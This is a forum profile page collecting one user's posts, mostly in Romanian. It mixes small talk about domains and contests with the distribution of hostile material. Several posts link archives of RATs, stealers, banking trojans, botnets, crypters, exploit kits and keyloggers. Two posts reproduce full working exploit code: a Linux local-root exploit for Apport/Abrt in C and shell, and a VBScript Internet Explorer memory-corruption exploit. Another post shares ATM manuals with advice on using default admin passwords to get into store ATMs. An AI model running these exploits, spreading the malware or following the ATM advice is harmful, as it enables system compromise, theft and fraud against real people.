Jump to content

FaramirSV

Active Members
  • Posts

    92
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by FaramirSV

  1. eu am luat "pulsul" la o masă și a ieșit 109 bpm
  2. da,eu am 4 domenii care trebuiau platite pana pe data de 14 feb. si inca sunt active.
  3. numai eu cred ca astia iau amprentele? altfele de ce ar fi zis sa tinem degetul mare la camera si putin pe blit. avand in vedere ca e un random de batai... toate se aud la fel.
  4. e ok,dar cer taxa de 4$(12$-8ref) pe configurare,am inregistrat si eu 4 domenii,acum sa vedem cat tin.. oricum o sa imi ceara banii pana pe 14. dar oricum,e foarte convenabil... 4$ (domeniu + gazduire buna un an si certificat SSL).
  5. ?i dac? falsific voturi ce rezolv? concursul nu se bazeaza strict pe voturi,la final vor fi alese 3 opere din primele 25 indiferent de num?rul de voturi aferente. Cinstit ?i curat e mai bine.
  6. Nina este partenera mea. V? mul?umesc frumos pentru voturi!
  7. Bun? ziua, Recent am descoperit un concurs de fotografie fondat de Bit4coin ?i al?i 6 parteneri cu drept de vot ai acestuia. Premiile sunt în valoare de 1750€ (locul I= 1000€,locul II= 500€ respectiv locul III=250€) ?i m-am hot?rât s? public ?i eu o crea?ie referitoare la bitcoin. Crea?ia este publicat? aici: https://bit4coin.net/bitcoin-photo-contest/photos/486 Dac? aprecia?i munca depus? în aceast? crea?ie apelez la voi s? m? ajuta?i cu un vot (un click pe inimioara),consider c? am ?anse s? m? calific în primii 3 dar am nevoie de încuraj?rile voastre. Cu toat? stima,v? mul?umesc!
  8. Am eu un cont PRO pe Teamtreehouse,care il doreste si are minim 100 de posturi pe acest forum sa imi dea PM.
  9. FaramirSV

    Udemy

    Ori folositi metoda lui FarSe ori vizitati aceste 2 site-uri care se actualizeaza zilnic cu cupoane noi: Any Coupon Code Udemy Coupon Code and Free Discount Codes
  10. multumesc de recomandare,de curiozitate o sa incerc si eu,nu mi-ar strica niste bani in plus ca sa imi platesc facturile
  11. FaramirSV

    Udemy

    Learn The Basics of Ethical Hacking and Penetration Testing Learn Python Programming
  12. A complete guide to SQL Injection in which you will design your own lab and learn to attack it. Pentesting + Hacking + SQLI Page: SQL Injection Master Course Price: €337
  13. Still-Born-Rat Image: Size: 2.3 MB md5sum: fcec1dcfe59a9d9f1280d3332d38f81d Download: [url=http://speedy.sh/Xfr7a/STBRAT.tar.gz]STBRAT.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] RazStealer2 v 0.5 Size: 6.2 MB md5sum: 927e07de09968d1187d58771f75c6c02 Download: [url=http://speedy.sh/fsU2N/RazStealer-2-Cracked.tar.gz]RazStealer 2 Cracked.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] AndroRat Size: 9.1 MB md5sum: 43c72352444deff10abb928c3f0b2f66 Download: [url=http://speedy.sh/aNxtb/Androrat.tar.gz]Androrat.tar.gz - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR] DroidJack v 4.0 uncracked Size: 17.8 MB md5sum: 1410e9075b1a5b9294e19523896f6791 Download: [url=http://speedy.sh/xKPd8/DroidJack-v4.0.zip]DroidJack v4.0.zip - Speedy Share - upload your files here[/url] Status: [COLOR="#00FF00"]clean[/COLOR]
  14. This project is intended for malware developers,researchers or other security experts. This is the final release of this project which contains: Android Source -Dendroid Size: 5.47 MB Download: [url=http://speedy.sh/brmnE/Android-Source.zip]Android Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e06a9a222a623dea995877129f1124541f571ca3 ====================== Banking-Trojans-Source bootkit hunter or zusy bot iBanking JHTTP source PowerLoader Spy eye v1.0 tinibanker Zemra ZeuS 2.0.8.9 Size: 42.36 MB Download: [url=http://speedy.sh/NScsB/Banking-Trojans-Source.zip]Banking-Trojans-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 56a56a9bea910a56d5398a43faae110f51f7999c ====================== Binders-Source Azazel Binder BBinder Stubgen Binder Joiner Biohazard Binder BlindSpotv1.0 (Binder) C++ Files Merger Danger Zone Binder Devil Binder 1.0 [SRC](VB6) Ejemplo Binder JABT1.2 - Justin Another Binder Tool Little Joiner NRG Binder Picture Binder Viotto Binder XP0wer CrypterBinder Size: 6.87 MB Download: [url=http://speedy.sh/fJ58N/Binders-Source.zip]Binders-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 8bac687326d3cdde2bc45ad3ac7b7fc693dc0355 ====================== Botnet-Source Acebot Agobot blacksun DarkIRC Evilbot Forbot gtbot Litmus sdbot Spybot urxbot v0lk Botnet (rbot)x0n3 Satan v1.0 Priv8 By CorryL{x0n3 h4ck} 120 Moded By t0nixx 120 [BruteTest] V0.5 120 [DVNC TEST] DDOS V1.0 120 [ModBot] SNIFF VNCBRUTE SP2FIX NICK 120 [ModBot] SP2FIX SYM VNCBRUTE 120 [ModBot] V0.5 120 [ModBot] V1.0 120 [ModBot] VNCBRUTE MSSQL 2007 120 [netapi sym mohaa] (vncbrute sp2patch) 120 [SP2 PATCH BRUTE] V2.0 120 [SP2 PATCH] V2.0 120 [SP2FIX VNCBrute Mohaa] STRIP V1.0 120 [SP2FIX VNCBrute Mohaa] Test V1.0 120 [SP2fix VncBrute] FINALV1.0 120 MYSQL V2 120 MYSQL V999 120 MYSQL1THREAD V2 120 MYSQLBRUTE V2 120 PSTORE MSSQL SYM NTPASS VNC NETAPI 2007 120 VnC Brute+pStore @@ SKUZ FIXED DDOS @@ dkcs ddos bot Radmin scanner EcKstasy sHk Bot.svchost ns dev.NOT FOR RELEASE a a59base acidBot acidBot2fix acidbotEncypt Ad Clicker Bot Private Free Hack VIP Tool agobot3 0.2.1 pre4 priv AkBot IRC lsd mod AkBot x0r dns Akbot v0.4.1 netapi asn pstore spam aspergillus 1.3 bBot Version 0.6 BioZombie 1.5 Beta blacksun BlowSXT blueeyebot bmw bot mods botnet200 Brainbot v1.5 C 15Pub pre4.c C 15Pub CBot Fixed Version ChodeBot C++ v1 base ciscobawt Crackbot v1.4b final spin Crx realmbot.VNC+RFI Crx realmbot VNC exploit CYBERBOTv2.2 Stable.m0dd ownz.DreamWoRK CYBERBOTv4.0 DarkAnalNKX BACKDOOR REMOVED darkbot6a3 Darkness IRC Bot Darkness.last.mod dbot irc sell Dbot.v3.1 DCI Bot dci bot dopebot0.22 dopebot0.22.uncrippled dopebot dopebot 2.0 dopebot current drx realcast woopie EPiC BoT V1 fiesta Sploit pack ForBot sniffer other mods ch405 ForBot Olin SYM VNC NETAPI All The Public Shit frozenbot6 fukj00 fungus fxBot beta g spotv2.0 Gellbot 3 GENTOOreptile base GigaBot DCASS gsys1 gsys3 final gt badteam gt virtualslut gt gtbot hackersteam gtsev spreader gtsev spreader 2 H Bot M0d 3.0 M0dd3d by TH & Sculay H Bot M0d 3.0 M0dd3d by TH Sculay h3xb0t h4x0rb0t 2.0 gt edition happybot.v2.0b harvecter bot hdbotv0.2 ciscoscan hellbot3[10 06 05] hellbot10 06 05 hellbotv3 htmlinfectbot hydra 2008.1 I1.4b0 icebot icepack ie7 mod IHS H A V003 Exploits iis gt bot illusion bot Imbot1.3 V3.1 IMBOT MOD IMBot SRC $$ IMbotMod V4.1 InTeL m0dd Test101 ms0640 irbot0.15 ircd.tar.gz IrcWormv1.3 SourceCode IrINi bot 0.1 public limited version for win32 italian jbot JRBOT Modded By bloody kaiten.c knight KoBRA RFISCaN.EDiTEDBYBRaT l0lw0rm LiquidBot FixEd By Pr1muZ anD Ic3 litmus2 bot litmus2 bot 2 Lnknell LoexBot M0LdBotv1.0 small microbot mm0d asn mmodbasn ModBot V1 Mod by iNs v0.2 MSDN(mirc scan bot) MSITBotWin MSN Spread Bot Priv8 my poly sploit ie6 ie7 op firefox mystic Urx mystic Urx Fixed by Pr1muz nbot032 update 5 28 08 enc 07 10am Nbot NESBOT v5 nesebot1.1r ASN PNP nesebot1.2 Netapi.Prueb Norman.2oo6.Prif Jessi Off New Folder New NZM netapi bot niggerbot vnc nocrypt NinjaBot NITE AIM NtScan rbot nullbot[2.1.1] [23 11 05] nullbot[finals] NzM 3.0 By Ph3mt nzm netapi nzm priv shit nzmlite sql nzmlite symantec oscar panicAttack pBot pBot v2 Phatbot gh3tt0Bot Phatbot NortonBot phatbot SkYKr3w Phatbot stoney phatbot[11 20 04][PCAP][SYNSCAN] phatbot alpha1 phb2 php bot plague.gecko.netapi pr1vsrc nzm m0d by ibby private enzyme rxmod 04 04 05 prueva[1].Netapi.asn.m0dded Norman prv nzm rx.sp2fix.rcast PsyProxy pwnBoT Q8Bot q8bot r00fuzV1.1a r00t3d.asn.ftp.lsass.by.Morgan RAGEBOT RAGEBOT[Clean] RansomWar Ravbot rbot0.2 scionix 102b working rBot0.3.3Pub rbot LC Priv8 rBot sxt harro rBot 0.2 MODE by akusot.v1.5 rbot dnsquery2007 rbot netapi vnc ipswitch rBoT oTh3R dImeNsIoN 4.4x(2) rBoT oTh3R dImeNsIoN 4.4x rBotv0.6.6 privlsass Release no cpp reptile small reptile.04.pnp.asn.ftpd.reload Reptile. small .DMG.Fixes.0x1FE reptile reverb reverse rezo.ninjabot RFI SCAN.V2.PRIVATE 1x33x7 ri0t[v5] ri0t] ri0t v4 ri0t v5 ri0tv5 RNM5 Priv Pr1muZ rnm5b Rose v1.3 2007 by DreamWoRK Rose1.1 Rose 2008 Rose v1.3 2007 by DreamWoRK rouge bots xdcc Ruffbot1.2 MassAsnPrivShit 150705 Ruffbotv2 rx 14 09 06 Netapi doyley rx AKMod msDTC1025 Stripp3d sc4nn3rz rx asn 2 re worked v3 rx asn 2 re worked v2 rx asn 2 re worked v3 RX GUTTED rx sky2kpnpprivate RX STRIP BOTKILLER 0.5 rx dev service working lsass sasser ftpd rx dev+service+working lsass+sasser+ftpd rX lsdigital Mod priv Rx Temptation RXB tM d VNC NETAPI ASN 2006 rxBot0.6.6b priv stable CoKeHeAd rxbot EcLiPsE cReW 1.1.priv rxbot EcLiPsE cReW 1.1.priv RxBot MP RXBOT RevengE2005pnp rxBot sxt harro rxbot xerion 2.0 rxbot7.5 rxbot2006 rxbot 0.65 Rxbot 7.6 Modded Tr0gdor Rxbot 7.6 Modded Tr0gdor 2 Rxbot ak 7.7 fira pviv8 rxbot undertow 6 6 05ASN rxbot undertow 6 10 05 rxbot undertow[PnP]modded.memcpy.0.2 rxbot v0.6.5 pk lsdigital spreader rxBot v0.7.7 Sass s5 Sbot RARSpreader SBX.amk.0x00 screens sd with fake xdcc by Synco sd bot all SDbot05b getadm sdbot05b skbot mods by sketch sdbot i3s sdbot ntpass codefix nils 22.10.03 Sdbot Hardcore Mod By StOner SDBot with NB spreader SDX.amk.0x00 shadowbot m3 shadowbot shadowbotv3 shellbotFTP sHk Bot.svchost ns dev.NOT FOR RELEASE SkuZ BoT V.1 2006 SkuZ Netapi VNC IM Sky Bot incomplete Skype Spread(PoC).7z Small SpazBot SpyBot Leechbot r1.5a private spybot1.2 FULl spybot1.4 spybot 1.2c spybot 1.3m spybot 1.4 STEAMBOT src 2008 Stripped RXV8 svBot svbot activex svmail SYM VNC NETAP 304 ASN TANKBOT 1.0 tgspy nt TsGh Bot v3 uber wks asn m0dded Pr1v Unix bot 2.2.5 uNk + USB URX pnp asn Urx.SYM+ASN Urxbot.pRiV sKull.MoD ASN FTP WORKING vbbot vBot VNCscanner VrX 5 Priv8 Msn Yahoo TIM EXPLS DDOS 116kb w32 netapi rfi whit vnc exploit w32ogw0rm WarSkype wbot 0.2 Win32.Anthrax Win32.Divinorum Win32.Fga Win32.FridaySectoriate Win32.Harulf Win32.Mimail Win32.MiniPig Win32.Relock Win32.Whore wisdom wisdom3 wisdom phr0st modd Wiseg3ck0 AIM DDOS woodworm2 X0R USB By Virus xerion2.5 XfireSpread xTBot.0.0.2 priv ya.bot Zemra Source Zeus 1.1.0.0 zunker Zutick Administrator Bot Size: 190.74 MB (200,005,186 bytes) Download: [url=http://speedy.sh/chjZT/Botnet-Source.zip]Botnet-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 849f862af76c327caef0c41037c24858c072abc3 ====================== Crypters-Source Abstract Crypter Carb0n Crypter v1.7 [C++]darkcrypt0r Christmas Crypter CodingNation Crypter Crypter Crypter v1 Cryptic3source-Crypter Cryptosy Cryptosy Crypter Cyber Crypt 7 D0pe Crypter Dark Matrix Crypter DR True Crypter DW Crypter DYnAsTYCrypTeR UsG Evil Crypter v1 Fire Crypter Fly Crypter Indetectables Crypter m3m0s Crypter v2.0 Niller Crypter Njw0rm rat v3.5 NT Crypter v2 OhShin Crypter Open crypter Peacefull Crypter Poly Crypter Polymorphic crypter ProCrypter - Stubgen Rainerstoff Crypter redix crypter Relapse Private VB6 Crypter Royal crypter Runtime Crypter Schwarze Sonne crypter SkuLLByte Crypter Sotpot Simple Crypter Strong Crypt TNT Crypter Tughack crypter VB Crypter VBCrypto White-Crypt White Crypter Size: 16.43 MB Download: [url=http://speedy.sh/ZAC8X/Crypters-Source.zip]Crypters-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d27b9bc54ec1d64bb098b93dc0a2f1ac9d6739e1 ====================== DDoS-Tools-Source ATTBooter DDoS UDP-Tunnel Size: 6.09 MB Download: [url]http://speedy.sh/hezFt/DDoS-Tools-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d55c1bd0bc74c83eb8a83ae1d364550b409d88f1 ====================== Exploit-Kits-Source blackhole102 BleedingLife2 Crimepack3.1.3 eleonorev1 1.4.4 firepack Fragus BlacK ice-pack-3 Phoenix2.5 RIG sakura Sava Exploits Pack Size: 40.7 MB Download: [url]http://speedy.sh/Exny4/Exploit-Kits-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d66bad2a12c58695b0af23ae7a04a4700b5869c2 ====================== Keylogger-Source basic keylogger source Ejemplo keylogger Keylog Keylogger Keylogger Keylogger 2 Keylogger by Kyzer23 Keylogger C Keylogger C 1 Keylogger C 2 Keylogger C 3 Keylogger Cpp Keylogger FTP Sharp Keyloger v1.0 Size: 1.49 MB Download: [url]http://speedy.sh/AFrz7/Keylogger-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e9b0d8a8aab75c67eb5a3688e74e4825937678c7 ====================== POS-Malware-Source dexter Pony 1.9 Alina POS Size: 38.59 MB Download: [url]http://speedy.sh/chj2T/POS-Malware-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e0e73d3957486cf65c5af27781ab6d24d4052fbc ====================== RAT-Source AryanSourceRelease Blackshade FBI-RAT psyb Spy-net.2.7.beta Aero-Rat Agony Alte RAT Armageddon RAT BioNukE RAT Black Dream RAT BlueRAT Crypter Breaksoft RAT Ciccio RAT derSphear RAT Error 404 RAT Evoloution RAT F0xit 0.1 Fasito RAT FearRAT gh0st3.6 src HandleX RAT Heat RAT LocustPEA Messiah v2.0 RAT Minimo RAT Monk RAT Omega v1.1 RAT ProAgent V1.21 source Rat-b RAT Phillipp RAT Remote Administration Tool Storm v1.0 RAT Size: 113.45 MB Download: [url]http://speedy.sh/wc346/RAT-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 9294863ce7833fa8857fedba4915a9aea9b14dc5 ==============================================
  15. nu cred,continutul mi-a fost afisat dupa ce am cumparat pachetul + link de download... posibil ca videoclipurile sa fie puse pe privat si pot fi accesate doar daca ai URL-ul
  16. Nu m-am putut ab?ine s? nu m? abonez la ei ?i m-am gândit s? împ?rt??esc cu voi lec?iile a?a zisor "Gagici care te înva?? programare" . 1.INTERNET INTRO 2.HTML 3.CSS 4.Programming 5.PHP 6.SEO
  17. nu m-am putut abtine si m-am si abonat cu 6-7$
  18. Salutare si bine ai venit.Toate cele bune si succes in continuare.
  19. [CVE-2015-1318,CVE-2015-1862] Apport/Abrt Local Root Exploit #define _GNU_SOURCE #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <fcntl.h> #include <signal.h> #include <elf.h> #include <err.h> #include <syslog.h> #include <sched.h> #include <linux/sched.h> #include <sys/types.h> #include <sys/stat.h> #include <sys/auxv.h> #include <sys/wait.h> # warning this file must be compiled with -static // // Apport/Abrt Vulnerability Demo Exploit. // // Apport: CVE-2015-1318 // Abrt: CVE-2015-1862 // // -- taviso@cmpxchg8b.com, April 2015. // // $ gcc -static newpid.c // $ ./a.out // uid=0(root) gid=0(root) groups=0(root) // sh-4.3# exit // exit // // Hint: To get libc.a, // yum install glibc-static or apt-get install libc6-dev // int main(int argc, char **argv) { int status; Elf32_Phdr *hdr; pid_t wrapper; pid_t init; pid_t subprocess; unsigned i; // Verify this is a static executable by checking the program headers for a // dynamic segment. Originally I thought just checking AT_BASE would work, // but that isnt reliable across many kernels. hdr = (void *) getauxval(AT_PHDR); // If we find any PT_DYNAMIC, then this is probably not a static binary. for (i = 0; i < getauxval(AT_PHNUM); i++) { if (hdr[i].p_type == PT_DYNAMIC) { errx(EXIT_FAILURE, "you *must* compile with -static"); } } // If execution reached here, it looks like we're a static executable. If // I'm root, then we've convinced the core handler to run us, so create a // setuid root executable that can be used outside the chroot. if (getuid() == 0) { if (chown("sh", 0, 0) != 0) exit(EXIT_FAILURE); if (chmod("sh", 04755) != 0) exit(EXIT_FAILURE); return EXIT_SUCCESS; } // If I'm not root, but euid is 0, then the exploit worked and we can spawn // a shell and cleanup. if (setuid(0) == 0) { system("id"); system("rm -rf exploit"); execlp("sh", "sh", NULL); // Something went wrong. err(EXIT_FAILURE, "failed to spawn root shell, but exploit worked"); } // It looks like the exploit hasn't run yet, so create a chroot. if (mkdir("exploit", 0755) != 0 || mkdir("exploit/usr", 0755) != 0 || mkdir("exploit/usr/share", 0755) != 0 || mkdir("exploit/usr/share/apport", 0755) != 0 || mkdir("exploit/usr/libexec", 0755) != 0) { err(EXIT_FAILURE, "failed to create chroot directory"); } // Create links to the exploit locations we need. if (link(*argv, "exploit/sh") != 0 || link(*argv, "exploit/usr/share/apport/apport") != 0 // Ubuntu || link(*argv, "exploit/usr/libexec/abrt-hook-ccpp") != 0) { // Fedora err(EXIT_FAILURE, "failed to create required hard links"); } // Create a subprocess so we don't enter the new namespace. if ((wrapper = fork()) == 0) { // In the child process, create a new pid and user ns. The pid // namespace is only needed on Ubuntu, because they check for %P != %p // in their core handler. On Fedora, just a user ns is sufficient. if (unshare(CLONE_NEWPID | CLONE_NEWUSER) != 0) err(EXIT_FAILURE, "failed to create new namespace"); // Create a process in the new namespace. if ((init = fork()) == 0) { // Init (pid 1) signal handling is special, so make a subprocess to // handle the traps. if ((subprocess = fork()) == 0) { // Change /proc/self/root, which we can do as we're privileged // within the new namepace. if (chroot("exploit") != 0) { err(EXIT_FAILURE, "chroot didnt work"); } // Now trap to get the core handler invoked. __builtin_trap(); // Shouldn't happen, unless user is ptracing us or something. err(EXIT_FAILURE, "coredump failed, were you ptracing?"); } // If the subprocess exited with an abnormal signal, then everything worked. if (waitpid(subprocess, &status, 0) == subprocess) return WIFSIGNALED(status) ? EXIT_SUCCESS : EXIT_FAILURE; // Something didn't work. return EXIT_FAILURE; } // The new namespace didn't work. if (waitpid(init, &status, 0) == init) return WIFEXITED(status) && WEXITSTATUS(status) == EXIT_SUCCESS ? EXIT_SUCCESS : EXIT_FAILURE; // Waitpid failure. return EXIT_FAILURE; } // If the subprocess returned sccess, the exploit probably worked, reload // with euid zero. if (waitpid(wrapper, &status, 0) == wrapper) { // All done, spawn root shell. if (WIFEXITED(status) && WEXITSTATUS(status) == 0) { execl(*argv, "w00t", NULL); } } // Unknown error. errx(EXIT_FAILURE, "unexpected result, cannot continue"); } Apport - Local Linux Root #!/bin/sh # # CVE-2015-1318 # # Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758 # # Example: # # % uname -a # Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux # # % lsb_release -a # No LSB modules are available. # Distributor ID: Ubuntu # Description: Ubuntu 14.04.2 LTS # Release: 14.04 # Codename: trusty # # % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }' # apport 2.14.1-0ubuntu3.8 # # % id # uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...) # # % ./apport.sh # pwned-4.3# id # uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...) # pwned-4.3# exit TEMPDIR=$(mktemp -d) cd ${TEMPDIR} cp /bin/busybox . mkdir -p dev mnt usr/share/apport ( cat << EOF #!/busybox sh ( cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned chmod 5755 /mnt/1/root/tmp/pwned ) EOF ) > usr/share/apport/apport chmod +x usr/share/apport/apport ( cat << EOF mount -o bind . . cd . mount --rbind /proc mnt touch dev/null pivot_root . . ./busybox sleep 500 & SLEEP=\$! ./busybox sleep 1 ./busybox kill -11 \$SLEEP ./busybox sleep 5 EOF ) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \ lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null /tmp/pwned -p rm -Rf ${TEMPDIR}
  20. //* allie(win95+ie3-win10+ie11) dve copy by yuange in 2009. https://twitter.com/yuange75 http://http://hi.baidu.com/yuange1975 *// <!doctype html> <html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <head> </head> <body> <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") shell.ShellExecute "notepad.exe" end function </script> <SCRIPT LANGUAGE="VBScript"> dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script> </body> </html>
  21. O mica colectie de boti pentru voi. Bot Bundle 1 - ( includes over 150 bots with source code and moded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here
  22. These are official manuals for various ATMs, includes. - Default passwords - Navigation for admin panel - Repair parts - Opening the ATM ...etc You can use these to access a ATM in a dollar store, grocery store or other small stores which may still have the default admin password from there you basically have access to everything. Details: Size: 129.5 MB sha1sum: dab657de2b7dab8e00b42e3872f1002882bcc2e1 Download: ATM.zip - Speedy Share - upload your files here ApolloManual GenesisLTManual GenesisManual Genmega 1900 Manual 2010 Hantle 1700W Manual 2010 Hantle C4000 Manual 2010 Hantle T4000 Manual 2010 MB1500 Operator Manual MoniMax5100T Operator Manual V2 NH-1800 Operator V1.1 NH-1800CEManual NH-1800SE manual NH-2100T Operator Manual V1.1 NH-2700 Operator manual RL1600Manual RL2000Manual RL5000Manual RT2000Manual Tranax MB Operator Manual Triton8100Manual Triton9100Manual Triton9600Manual Triton9700Manual Source: hell
  23. Here's an outline: 1. Anonymizing Your Internet Usage 2. Securing Your Browser 3. PGP Encryption 4. Changing Your Mac Address 5. Anonymous IM 6. Anti-virus 1. Anonymizing Your Internet Usage The easiest way to anonymize your internet usage is to use TOR or a VPN RELIGIOUSLY. NON-STOP 24/7 FUCKING TOR ACTION NOT EVEN A SINGLE GOOGLE OUTSIDE TOR/VPN VPN A Virtual Private Network helps to ensure privacy by creating an encrypted tunnel between your computer and a remote VPN server. Example setup without VPN: Home PC -> ISP -> Internet Example setup with VPN: Home PC => ISP => VPN server -> Internet Once data has entered the VPN tunnel (=…=) it is hidden from view by encryption protocols so that no-one, not even your Internet Service Provider (ISP), can ‘see’ it. The only computers that can see the data are the ones at each end of the VPN tunnel. Because the VPN server can see all data going into and out-of the tunnel (and trace it back to you), it is vital to choose a VPN provider you trust, and who keeps no logs of your internet activity. If you are concerned about privacy then you should never pick a VPN provider who keeps logs, and the comments below assume a no logs service. Providers we particularly like that are good for keeping no logs are Mullvad, AirVPN and Private Internet Access (although the fact that PIA is US based has introduced considerable uncertainty to this recommendation). Pros: As long as your VPN provider is trustworthy and keeps no logs, VPN is a very secure and anonymous means of surfing the internet It is also good for securing connections at public WiFi hotspots, and for evading firewalls used to censor the internet It is a lot faster than Tor (although there will be a small hit to your internet speeds) It is very good for P2P filesharing, and ‘spoofing’ IPs in order to stream geo-restricted media content (e.g. Hulu). Cons: It relies on trusting your VPN provider, and is therefore not as secure as Tor It costs money (typically between $7 to $10 per month, with substantial discounts for bulk purchases). Many VPN providers accept Bitcoin payments. It is obvious to observers that you are using VPN. TOR (You should be familiar with TOR, but I'll throw it in here for educational purposes.) Tor is an anonymity network that supplies free software which lets you use the internet anonymously. Basically you connect though a number of randomly selected nodes (at least three), with the data being re-encrypted each time. This means that although each node knows who is connecting to it, and who it connects to, no node knows the whole route (circuit). The final link in the chain, the one that connects you to the internet, is known as an exit node, and is one of the biggest weaknesses of the system. See a Sybil attack for more information on this. My favorite motto is: "You're only as safe as the exit node you're connected to." Also, don't run exist nodes because if anyone watches CP through it, you're responsible and they will take you down. This has led to a fairly small number of public exit nodes being available, and has meant that restrictive governments such as China, who monitor these nodes, have been able to block access to many of them. There are still plenty of nodes around however, but it does mean that Tor users in some countries my need to reconnect to a number of different nodes before they find one that has not been blocked. Pros: Very secure and anonymous (in fact it is generally considered the most secure and anonymous way to access the internet available, and is therefore suitable for political dissidents and the like) It is also good for securing connections at public WiFi hotspots and for evading firewalls used to censor the internet (although see comments blocked exit nodes above) Free Cons: Slow (often very) Restrictive countries can make finding unblocked public exit nodes a pain Not good for P2P downloading and streaming from spoofed IPs – not only are network speeds too slow for this to be practical, but doing so slows down the system even more for other users. In addition to this, volunteers running the exit nodes may be held accountable for your copyright violations, so it is considered very rude It is obvious to observers that you are using Tor, and some websites (such as PayPal) may refuse to play ball Other services which may be of interest include JonDonym, Lahana, I2P and Psiphon. === 2. Securing Your Browser By now you're probably using the Tor Browser Bundle or TBB for short. This is the easiest way to go about things. a. Ensure NoScript is disabling scripts globally. b. Click the 3 bars/settings menu, then click HTTPS and finally enable "Block All HTTP Requests". This makes it so that you can't get ARP poisoned for cleartext passwords. Never hurts to make all your connections HTTPS, right? c. Click again on the 3 bars. Now select 'Options' and navigate to the Privacy tab. Select 'Do not tell sites...' and under "History" choose 'Never Remember History'. FLUSH YER DNS! Computers automatically cache the hostname of the websites you have visited to make reloading the pages faster than if there was no cache. This is clearly not wanted. ipconfig /flushdns CCleaner CLEARNET LINK: https://www.piriform.com/ccleaner CCleaner cleans out pesky Flash cookies and also a host other rubbish that is slowing your computer down and leaving traces of your internet activity behind. Flash cookies or ‘zombie cookies’ are bits of persistent Flash code which respawn regular cookies when they are modified or deleted. To configure CCleaner to work properly and delete these, 1. Open CCleaner, then navigating to Options -> Include -> Add: C:\ -> Users -> User name -> AppData -> Roaming > Macromedia > Flash Player -> #SharedObjects and C:\ ->Users 